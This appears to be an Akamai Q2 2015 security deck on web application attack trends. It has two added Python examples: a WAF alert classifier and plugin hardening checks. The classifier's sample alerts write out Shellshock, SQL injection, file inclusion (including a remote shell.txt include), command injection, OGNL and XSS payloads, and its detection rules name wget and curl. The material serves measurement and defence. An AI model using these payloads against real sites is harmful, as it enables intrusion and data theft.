[Q2 2015] web application attacks
akamai.com
= 9 web application attack vectors
In Q2 2015, Akamai reported on nine different web application attack vectors:
• SQLi / SQL injection: User content is passed to an SQL statement without proper validation
• LFI / Local file inclusion: Gains unauthorized read access to local files on the web server
• RFI / Remote file inclusion: Abuse of the dynamic file include mechanism available in many programming languages to load remote malicious code into the victim web application
• PHPi / PHP injection: Injects PHP code that gets executed by the PHP interpreter
• CMDi / Command injection: Executes arbitrary shell commands on the target system
• JAVAi / Java injection: Abuses the Object Graph Navigation Language (OGNL), a Java expression language. Popular due to recent flaws in the Java-based Struts Framework, which uses OGNL extensively
• MFU / Malicious file upload (or unrestricted file upload): Uploads unauthorized files to the target application that may be used later to gain full control over the system
• XSS / Cross-site scripting: Injects client-side code into web pages viewed by others, whose browsers execute the code within the security context (or zone) of the hosting site. Reads, modifies and/or transmits data accessible by the browser
• Shellshock / Disclosed in September 2014: A vulnerability in the Bash shell (the default shell for Linux and Mac OS X) that allows arbitrary command execution by a remote attacker
2 / [The State of the Internet] / Security (Q2 2015)
= Shellshock attacks
• Shellshock accounted for 49% of web application attacks in Q2 2015
• 95% of Shellshock attacks targeted a single financial services firm
• 95% of all attacks over HTTPS in April were attributed to Shellshock
• 173 million total Shellshock attacks against Akamai customers in Q2
• The high rate of Shellshock attacks shifted the balance between HTTPS and HTTP channels
• 56% of attacks were over HTTPS in Q2 2015, compared to 9% in Q1
• Shellshock attacks are carried out over HTTPS 96% of the time
= other common attack vectors
• SQLi attacks accounted for 26% of all web application attacks
• Discounting Shellshock attacks, SQLi totaled 55% of attacks
• More than 92 million SQLi attacks in Q2 2015
• The number of SQLi alerts increased by 75% over Q1 2015
• LFI attacks accounted for 18% of all web application attacks
• 63 million LFI alerts in Q2 2015, compared to 75 million in Q1
• The remaining six vectors accounted for 7% of all web application attacks
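As an added example (not code from the Akamai report), the Python script below applies the nine-vector taxonomy from the start of this deck to a handful of constructed WAF alert records and derives the same kinds of figures the deck quotes: each vector's share of alerts, the shares with Shellshock discounted, and how often a given vector arrived over HTTPS. The signatures are deliberately minimal illustrations, not Akamai's detection rules, and every alert line is invented.

```python
"""Classify constructed WAF alert records into the nine attack vectors
named in the Akamai Q2 2015 deck and compute per-vector shares.
Added example; the rules and the alert lines are constructed, not Akamai's."""
import re
from collections import Counter
from urllib.parse import unquote

# Minimal signature-style rules, one per vector in the deck. The first
# matching rule wins, so more specific patterns come before generic ones.
RULES = [
    ("Shellshock", re.compile(r"\(\)\s*\{")),           # bash function prefix in a header
    ("SQLi",  re.compile(r"(?i)union\s+select|'\s*or\s+\d+=\d+|--\s*$")),
    ("CMDi",  re.compile(r"[;|`]\s*(cat|id|wget|curl)\b")),  # shell metachar + command
    ("RFI",   re.compile(r"(?i)=\s*(https?|ftp)://")),  # include parameter pointing off-host
    ("LFI",   re.compile(r"(\.\./){2,}|/etc/passwd")),  # directory climbing / local file read
    ("PHPi",  re.compile(r"(?i)<\?php|php://")),
    ("JAVAi", re.compile(r"[%$]\{")),                   # OGNL expression delimiters
    ("MFU",   re.compile(r'(?i)filename="[^"]+\.(php|jsp|aspx?)"')),
    ("XSS",   re.compile(r"(?i)<script|javascript:|onerror\s*=")),
]

# Constructed alert records: (scheme, request line plus the offending header or body).
SAMPLE_ALERTS = [
    ("https", "GET /cgi-bin/status :: User-Agent: () { :; }; echo probe"),
    ("https", "GET /cgi-bin/env :: User-Agent: () { :; }; echo probe"),
    ("http",  "GET /products?id=1' OR 1=1--"),
    ("http",  "GET /items?id=5 UNION SELECT name,pass FROM users"),
    ("http",  "GET /login?user=admin'--"),
    ("http",  "GET /view?page=../../../../etc/passwd"),
    ("http",  "GET /index.php?include=http://example.invalid/shell.txt"),
    ("http",  "GET /ping?host=127.0.0.1;cat /etc/hosts"),
    ("http",  "POST /page.php :: body: data=<?php echo 1; ?>"),
    ("http",  "GET /struts/action?name=%25%7B1%2B1%7D"),   # URL-encoded %{1+1}
    ("https", 'POST /upload :: Content-Disposition: form-data; filename="avatar.php"'),
    ("http",  "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E"),
    ("https", "GET /home?lang=en"),                        # benign request, no alert
]


def classify(request: str):
    """Return the vector name for a request, or None if no rule matches.
    Percent-decoding first stops trivial encoding from evading the rules."""
    decoded = unquote(request)
    for name, pattern in RULES:
        if pattern.search(decoded):
            return name
    return None


def vector_shares(alerts, exclude=()):
    """Percentage of classified alerts per vector, optionally discounting
    some vectors (the deck recomputes SQLi's share without Shellshock)."""
    counts = Counter()
    for _, request in alerts:
        vector = classify(request)
        if vector and vector not in exclude:
            counts[vector] += 1
    total = sum(counts.values())
    return {v: round(100 * n / total, 1) for v, n in counts.items()} if total else {}


def https_share(alerts, vector: str) -> float:
    """Percentage of a vector's alerts that arrived over HTTPS."""
    schemes = [scheme for scheme, req in alerts if classify(req) == vector]
    if not schemes:
        return 0.0
    return round(100 * sum(s == "https" for s in schemes) / len(schemes), 1)


if __name__ == "__main__":
    for vector, share in sorted(vector_shares(SAMPLE_ALERTS).items(), key=lambda kv: -kv[1]):
        print(f"{vector:<10} {share:5.1f}%  (HTTPS: {https_share(SAMPLE_ALERTS, vector):5.1f}%)")
    print("without Shellshock:", vector_shares(SAMPLE_ALERTS, exclude=("Shellshock",)))
```

Because the share is recomputed over whatever survives the exclusion, the same function gives both the headline percentages and the "discounting Shellshock" view; a production classifier would of course draw on the WAF's own rule set rather than these illustrative regexes.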
= top 10 source countries
China was the source of more than half of attacking IPs, with the US in second place. Countries with a higher population and higher connectivity are often the source of attack traffic.
= top 10 target countries
Websites based in the US were the most common targets for web application attacks in Q2 2015. The US is consistently one of the top targets for malicious actors.
= targeted industries
• Retail and financial services were subject to the greatest number of malicious requests
• Shift from Q1 2015, when retail and media/entertainment sectors were the most popular targets
• Shellshock attacks are not included because of their focus on a single company
• SQLi and LFI were the most common attack vectors for retail and financial services
• XSS attacks also targeted primarily retail and financial services
• RFI attacks were mostly used against financial services and hotel/travel
• MFU attacks overwhelmingly targeted the hotel and travel industry
• PHPi attacks focused on targets in retail and the public sector
= WordPress plugin vulnerabilities
• The popularity of the WordPress platform has made it a popular target
• Third-party plugins and themes create vulnerabilities
• Third-party developers have varying levels of skill
• Plugins from third-party websites may not be carefully vetted
• Updates to plugins and themes do not undergo stringent review
• Akamai tested 1,322 plugins and themes
• 25 had one or more vulnerabilities, for a total of 49 potential exploits
• Most common vulnerabilities were XSS, LFI and path traversal (PT) exploits, along with email header injection
• Recommendations for hardening are found in the Q2 2015 SOTI Security Report
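The deck names the weaknesses Akamai found most often in plugins and themes but not the fixes. As an added example, not the report's recommendations and not plugin code, the Python below (WordPress plugins are PHP, but the checks translate directly) shows the vulnerable and hardened form of a template include, a line-break check that stops email header injection in a contact form, and output escaping against stored XSS. The theme directory and all inputs are constructed.

```python
"""Hardening checks for three plugin weaknesses named in the deck: path
traversal / LFI, email header injection and XSS. Added example; the
template directory and every input below are constructed."""
import html
import os
import re

# Constructed template directory of a hypothetical theme (assumption).
TEMPLATE_DIR = "/srv/wp-content/themes/example-theme"


def template_path_unsafe(base_dir: str, name: str) -> str:
    """Vulnerable form: the user-supplied name goes straight into the path,
    so '../../wp-config.php' or an absolute path escapes base_dir."""
    return os.path.join(base_dir, name)


def template_path(base_dir: str, name: str) -> str:
    """Hardened form: resolve symlinks and '..' first, then require the
    result to still be inside base_dir (component-wise, not a string prefix)."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"template name escapes {base_dir}: {name!r}")
    return candidate


def is_safe_template(base_dir: str, name: str) -> bool:
    """Boolean wrapper around template_path for callers that only need a verdict."""
    try:
        template_path(base_dir, name)
        return True
    except ValueError:
        return False


_HEADER_BREAK = re.compile(r"[\r\n]")


def header_value(value: str) -> str:
    """Reject CR/LF so a form field cannot append extra headers (for example
    an attacker-chosen Bcc:) to the outgoing mail."""
    if _HEADER_BREAK.search(value):
        raise ValueError("line break in mail header value")
    return value.strip()


def is_safe_header(value: str) -> bool:
    return _HEADER_BREAK.search(value) is None


def build_mail(sender: str, subject: str, body: str) -> str:
    """Assemble a minimal RFC 5322 message from validated header values."""
    headers = [("From", header_value(sender)), ("Subject", header_value(subject))]
    head = "\r\n".join(f"{name}: {value}" for name, value in headers)
    return head + "\r\n\r\n" + body


def render_comment(author: str, text: str) -> str:
    """Escape untrusted strings before placing them in HTML (stored XSS)."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(text)}</p>"


if __name__ == "__main__":
    print("unsafe :", template_path_unsafe(TEMPLATE_DIR, "../../wp-config.php"))
    print("safe   :", template_path(TEMPLATE_DIR, "parts/header.php"))
    for bad in ("../../wp-config.php", "/etc/passwd"):
        print("blocked:", bad, "->", is_safe_template(TEMPLATE_DIR, bad))
    print(build_mail("reader@example.invalid", "Hello", "body text"))
    print(render_comment("<script>", "plain text"))
```

The path check uses `os.path.commonpath` rather than `startswith` so a sibling directory such as `example-theme-evil` is rejected as well, and it runs after any URL decoding the request handler performs, since an encoded `..%2f` must be normalized before it is judged.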
= Q1 2015 State of the Internet – Security Report
Download the Q2 2015 State of the Internet Security Report
• The Q2 2015 report covers:
  ⁄ Analysis of DDoS and web application attack trends
  ⁄ Bandwidth (Gbps) and volume (Mpps) statistics
  ⁄ Year-over-year and quarter-by-quarter analysis
  ⁄ Attack frequency, size, types and sources
  ⁄ Multi-vector mega attacks leveraging UDP and SYN floods
  ⁄ Dangers of third-party WordPress plugins and themes
  ⁄ Analysis of the Onion Router (Tor) project risks
  ⁄ Threat advisories issued in Q2 2015, including OurMine Team and RIPv1
= about stateoftheinternet.com
• StateoftheInternet.com, brought to you by Akamai, serves as the home for content and information intended to provide an informed view into online connectivity and cybersecurity trends as well as related metrics, including Internet connection speeds, broadband adoption, mobile usage, outages, and cyber-attacks and threats.
• Visitors to www.stateoftheinternet.com can find current and archived versions of Akamai's State of the Internet (Connectivity and Security) reports, the company's data visualizations, and other resources designed to put context around the ever-changing Internet landscape.